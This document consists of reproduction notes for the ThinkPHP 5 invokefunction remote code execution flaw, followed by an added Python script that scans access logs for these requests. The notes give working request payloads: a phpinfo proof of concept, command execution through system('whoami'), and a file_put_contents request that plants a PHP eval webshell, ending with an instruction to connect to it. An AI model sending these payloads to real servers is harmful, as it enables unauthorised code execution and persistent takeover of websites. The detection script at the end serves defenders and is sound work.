Vulnerability reproduction (5-rce)
PoC:
/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100
Payload 1:
Code execution
Format:
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=<system command>&vars[1][]=<command>
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
Payload 2:
Writing a webshell
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<URL-encoded content of the file you want to write>
The final payload with the content added:
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=%3C%3Fphp%20%40eval%28%24_POST%5B2233%5D%29%3B%3F%3E
Finally, connect to the webshell.
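
For the defender's side of the requests above, here is an added detection example (not part of the original notes) that scans web access logs for the invokefunction route and the callables these payloads pass to it. The log format (combined), the function names classify and scan, and the sample log lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Controller route used by every request on this page (either slash direction).
ROUTE_RE = re.compile(r"think[\\/]+app[\\/]+invokefunction", re.IGNORECASE)
# Callables that appear in the page's requests.
RISKY_CALLABLES = {"phpinfo", "call_user_func_array", "system", "file_put_contents"}
# Request target inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return findings for one request target (path plus query string)."""
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    route = next((v for k, v in params if k == "s"), "")
    # parse_qsl decodes once; unquote again to catch a double-encoded route.
    if not ROUTE_RE.search(unquote(route)):
        return []
    findings = ["route:invokefunction"]
    for key, value in params:
        if key in ("function", "vars[0]") and value.lower() in RISKY_CALLABLES:
            findings.append("callable:" + value.lower())
        if key == "vars[1][]" and "<?php" in value.lower():
            findings.append("php-code-in-argument")
    return findings

def scan(log_lines):
    """Return (line_number, findings) for each log line that matches."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        findings = classify(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits

# Constructed log lines (documentation IP, made-up timestamps); the request
# targets on lines 1-3 are the ones shown on this page, line 4 is benign.
PREFIX = '203.0.113.7 - - [10/Dec/2018:10:00:00 +0000] "GET '
SAMPLE_LOG = [PREFIX + t + ' HTTP/1.1" 200 512' for t in (
    r'/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100',
    r'/index.php?s=index/think\app/invokefunction&function=call_user_func_array'
    r'&vars[0]=system&vars[1][]=whoami',
    r'/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array'
    r'&vars[0]=file_put_contents&vars[1][]=shell.php'
    r'&vars[1][]=%3C%3Fphp%20%40eval%28%24_POST%5B2233%5D%29%3B%3F%3E',
    r'/index.php?s=index/index/hello&name=think',
)]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, findings)
```

A hit with php-code-in-argument alongside callable:file_put_contents means the web root should be checked for a newly written file such as the shell.php named in the request.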